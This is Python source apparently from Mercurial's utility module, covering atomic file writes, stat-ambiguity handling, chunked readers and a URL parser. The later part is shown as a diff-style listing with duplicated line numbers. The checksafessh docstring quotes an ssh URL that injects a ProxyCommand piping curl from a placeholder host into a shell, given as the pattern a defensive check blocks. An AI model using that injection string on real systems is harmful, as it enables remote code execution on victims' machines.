          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more
        within the same second (= S[n-1].ctime), so comparison of
        timestamps is ambiguous.

        The base idea to avoid such ambiguity is "advance mtime 1 sec,
        if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes hidden by such mtime collisions.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of the file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

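# A minimal usage sketch (hypothetical path): take a snapshot before and
# after rewriting a file, and bump mtime when the two stats are ambiguous.
#
#   old = filestat.frompath(b'/repo/.hg/dirstate')
#   # ... rewrite the file ...
#   new = filestat.frompath(b'/repo/.hg/dirstate')
#   if new.isambig(old):
#       new.avoidambig(b'/repo/.hg/dirstate', old)
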
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat, and
    is useful only if the target file is guarded by a lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode,
                                    enforcewritable=('w' in mode))

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

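# A minimal usage sketch (hypothetical path): the context-manager form
# renames the temporary copy into place on a clean exit, and discards it
# if an exception escapes the block.
#
#   with atomictempfile(b'/repo/.hg/branch', checkambig=True) as f:
#       f.write(b'default\n')
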
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter ``l`` is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

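# A minimal usage sketch (hypothetical chunks): chunkbuffer turns an
# iterator of unevenly sized chunks into a file-like object with exact
# read() semantics.
#
#   buf = chunkbuffer(iter([b'abc', b'defgh', b'i']))
#   buf.read(4)  # -> b'abcd'
#   buf.read(5)  # -> b'efghi'
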
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, ``size``
    (default 131072) bytes at a time, up to the optional ``limit`` (default
    is to read all data). Chunks may be less than ``size`` bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

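# A minimal usage sketch (hypothetical file and consumer): stream a file in
# bounded chunks instead of reading it into memory at once.
#
#   with open(b'/tmp/data.bin', 'rb') as fp:
#       for chunk in filechunkiter(fp, size=65536):
#           process(chunk)  # `process` is a stand-in for real consumption
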
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

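# A minimal usage sketch (hypothetical stream): wrap a file object so a
# parser can consume at most `limit` bytes, with reads past the cap
# behaving like EOF.
#
#   reader = cappedreader(fh, 16)  # `fh` is an already-open file object
#   header = reader.read(1024)     # returns at most 16 bytes
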
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

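# A sketch of how the unit table above resolves (values computed from the
# table): the first row whose threshold is met wins.
#
#   bytecount(100 * (1 << 30))  # -> '100 GB'   (matches the %.0f GB row)
#   bytecount(1536)             # -> '1.50 KB'  (1 KB <= 1536 < 10 KB)
#   bytecount(42)               # -> '42 bytes' (falls through to last row)
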
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

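# A minimal usage sketch (hypothetical file object): write text with the
# platform's native line endings regardless of the EOLs in the input. On
# Windows the wrapper rewrites LF to CRLF; elsewhere it is the identity.
#
#   fp = nativeeolwriter(open(b'/tmp/out.txt', 'wb'))
#   fp.write(b'line one\nline two\n')
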
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

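# A minimal usage sketch (hypothetical mapping): expand '$'-prefixed
# placeholders in a byte string; '$' must be regex-escaped in the prefix.
#
#   interpolate(br'\$', {b'user': b'alice'}, b'hello $user')
#   # -> b'hello alice'
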
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
2943 # authinfo[1] is passed to urllib2 password manager, and its
2942 # URIs must not contain credentials. The host is passed in the
2944 # URIs must not contain credentials. The host is passed in the
2943 # URIs list because Python < 2.4.3 uses only that to search for
2945 # URIs list because Python < 2.4.3 uses only that to search for
2944 # a password.
2946 # a password.
2945 return (s, (None, (s, self.host),
2947 return (s, (None, (s, self.host),
2946 self.user, self.passwd or ''))
2948 self.user, self.passwd or ''))
2947
2949
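A small usage sketch of authinfo() (the URL below is made up): it returns the URL with credentials stripped, plus a 4-tuple for a urllib2-style password manager when a user is present.

    u = url(b'https://alice:secret@example.com/repo')
    saneurl, auth = u.authinfo()
    # saneurl == b'https://example.com/repo' (credentials removed)
    if auth is not None:
        realm, uris, user, passwd = auth
        # realm is None; uris is (saneurl, host), searched by the
        # password manager as described in the comment above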
2948 def isabs(self):
2950 def isabs(self):
2949 if self.scheme and self.scheme != 'file':
2951 if self.scheme and self.scheme != 'file':
2950 return True # remote URL
2952 return True # remote URL
2951 if hasdriveletter(self.path):
2953 if hasdriveletter(self.path):
2952 return True # absolute for our purposes - can't be joined()
2954 return True # absolute for our purposes - can't be joined()
2953 if self.path.startswith(br'\\'):
2955 if self.path.startswith(br'\\'):
2954 return True # Windows UNC path
2956 return True # Windows UNC path
2955 if self.path.startswith('/'):
2957 if self.path.startswith('/'):
2956 return True # POSIX-style
2958 return True # POSIX-style
2957 return False
2959 return False
2958
2960
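For illustration, which inputs the checks above classify as absolute (the paths are hypothetical):

    assert url(b'https://example.com/repo').isabs()   # remote scheme
    assert url(b'/home/joe/repo').isabs()             # POSIX-style
    assert not url(b'relative/path').isabs()          # can be joined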
2959 def localpath(self):
2961 def localpath(self):
2960 if self.scheme == 'file' or self.scheme == 'bundle':
2962 if self.scheme == 'file' or self.scheme == 'bundle':
2961 path = self.path or '/'
2963 path = self.path or '/'
2962 # For Windows, we need to promote hosts containing drive
2964 # For Windows, we need to promote hosts containing drive
2963 # letters to paths with drive letters.
2965 # letters to paths with drive letters.
2964 if hasdriveletter(self._hostport):
2966 if hasdriveletter(self._hostport):
2965 path = self._hostport + '/' + self.path
2967 path = self._hostport + '/' + self.path
2966 elif (self.host is not None and self.path
2968 elif (self.host is not None and self.path
2967 and not hasdriveletter(path)):
2969 and not hasdriveletter(path)):
2968 path = '/' + path
2970 path = '/' + path
2969 return path
2971 return path
2970 return self._origpath
2972 return self._origpath
2971
2973
2972 def islocal(self):
2974 def islocal(self):
2973 '''whether localpath will return something that posixfile can open'''
2975 '''whether localpath will return something that posixfile can open'''
2974 return (not self.scheme or self.scheme == 'file'
2976 return (not self.scheme or self.scheme == 'file'
2975 or self.scheme == 'bundle')
2977 or self.scheme == 'bundle')
2976
2978
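A sketch of how localpath() and islocal() behave for a few representative inputs, following the branches above:

    url(b'file:///tmp/repo').localpath()    # -> b'/tmp/repo'
    url(b'bundle:foo').localpath()          # -> b'foo'
    url(b'http://example.com/').islocal()   # -> False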
2977 def hasscheme(path):
2979 def hasscheme(path):
2978 return bool(url(path).scheme)
2980 return bool(url(path).scheme)
2979
2981
2980 def hasdriveletter(path):
2982 def hasdriveletter(path):
2981 return path and path[1:2] == ':' and path[0:1].isalpha()
2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2982
2984
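Both helpers are cheap predicates, for example:

    hasscheme(b'https://example.com')   # True
    hasscheme(b'/local/path')           # False
    hasdriveletter(b'c:/tmp')           # True
    hasdriveletter(b'1:/tmp')           # False: first byte must be a letter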
2983 def urllocalpath(path):
2985 def urllocalpath(path):
2984 return url(path, parsequery=False, parsefragment=False).localpath()
2986 return url(path, parsequery=False, parsefragment=False).localpath()
2985
2987
2986 def checksafessh(path):
2988 def checksafessh(path):
2987 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2988
2990
2989 This is a sanity check for ssh urls. ssh will parse the first item as
2991 This is a sanity check for ssh urls. ssh will parse the first item as
2990 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2991 Let's prevent these potentially exploitable urls entirely and warn the
2993 Let's prevent these potentially exploitable urls entirely and warn the
2992 user.
2994 user.
2993
2995
2994 Raises an error.Abort when the url is unsafe.
2996 Raises an error.Abort when the url is unsafe.
2995 """
2997 """
2996 path = urlreq.unquote(path)
2998 path = urlreq.unquote(path)
2997 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2998 raise error.Abort(_('potentially unsafe url: %r') %
3000 raise error.Abort(_('potentially unsafe url: %r') %
2999 (pycompat.bytestr(path),))
3001 (pycompat.bytestr(path),))
3000
3002
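Note that the path is unquoted first, so percent-encoded leading dashes are caught as well. A quick sketch (hostnames made up):

    checksafessh(b'ssh://user@host/repo')   # fine, returns None
    try:
        checksafessh(b'ssh://-oProxyCommand=x/path')
    except error.Abort:
        pass   # leading '-' would be parsed by ssh as an option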
3001 def hidepassword(u):
3003 def hidepassword(u):
3002 '''hide user credential in a url string'''
3004 '''hide user credential in a url string'''
3003 u = url(u)
3005 u = url(u)
3004 if u.passwd:
3006 if u.passwd:
3005 u.passwd = '***'
3007 u.passwd = '***'
3006 return bytes(u)
3008 return bytes(u)
3007
3009
3008 def removeauth(u):
3010 def removeauth(u):
3009 '''remove all authentication information from a url string'''
3011 '''remove all authentication information from a url string'''
3010 u = url(u)
3012 u = url(u)
3011 u.user = u.passwd = None
3013 u.user = u.passwd = None
3012 return bytes(u)
3014 return bytes(u)
3013
3015
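For example (credentials made up):

    hidepassword(b'http://alice:secret@example.com/')
    # -> b'http://alice:***@example.com/'
    removeauth(b'http://alice:secret@example.com/')
    # -> b'http://example.com/'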
3014 timecount = unitcountfn(
3016 timecount = unitcountfn(
3015 (1, 1e3, _('%.0f s')),
3017 (1, 1e3, _('%.0f s')),
3016 (100, 1, _('%.1f s')),
3018 (100, 1, _('%.1f s')),
3017 (10, 1, _('%.2f s')),
3019 (10, 1, _('%.2f s')),
3018 (1, 1, _('%.3f s')),
3020 (1, 1, _('%.3f s')),
3019 (100, 0.001, _('%.1f ms')),
3021 (100, 0.001, _('%.1f ms')),
3020 (10, 0.001, _('%.2f ms')),
3022 (10, 0.001, _('%.2f ms')),
3021 (1, 0.001, _('%.3f ms')),
3023 (1, 0.001, _('%.3f ms')),
3022 (100, 0.000001, _('%.1f us')),
3024 (100, 0.000001, _('%.1f us')),
3023 (10, 0.000001, _('%.2f us')),
3025 (10, 0.000001, _('%.2f us')),
3024 (1, 0.000001, _('%.3f us')),
3026 (1, 0.000001, _('%.3f us')),
3025 (100, 0.000000001, _('%.1f ns')),
3027 (100, 0.000000001, _('%.1f ns')),
3026 (10, 0.000000001, _('%.2f ns')),
3028 (10, 0.000000001, _('%.2f ns')),
3027 (1, 0.000000001, _('%.3f ns')),
3029 (1, 0.000000001, _('%.3f ns')),
3028 )
3030 )
3029
3031
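Assuming unitcountfn (defined earlier in this module) picks the first (multiplier, divisor, format) row with abs(value) >= multiplier * divisor, one would expect output such as:

    timecount(12.3)      # -> '12.30 s'   (the (10, 1) row)
    timecount(0.5)       # -> '500.0 ms'  (the (100, 0.001) row)
    timecount(0.000002)  # -> '2.000 us'  (the (1, 0.000001) row)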
3030 @attr.s
3032 @attr.s
3031 class timedcmstats(object):
3033 class timedcmstats(object):
3032 """Stats information produced by the timedcm context manager on entering."""
3034 """Stats information produced by the timedcm context manager on entering."""
3033
3035
3034 # the starting value of the timer as a float (meaning and resolution is
3036 # the starting value of the timer as a float (meaning and resolution is
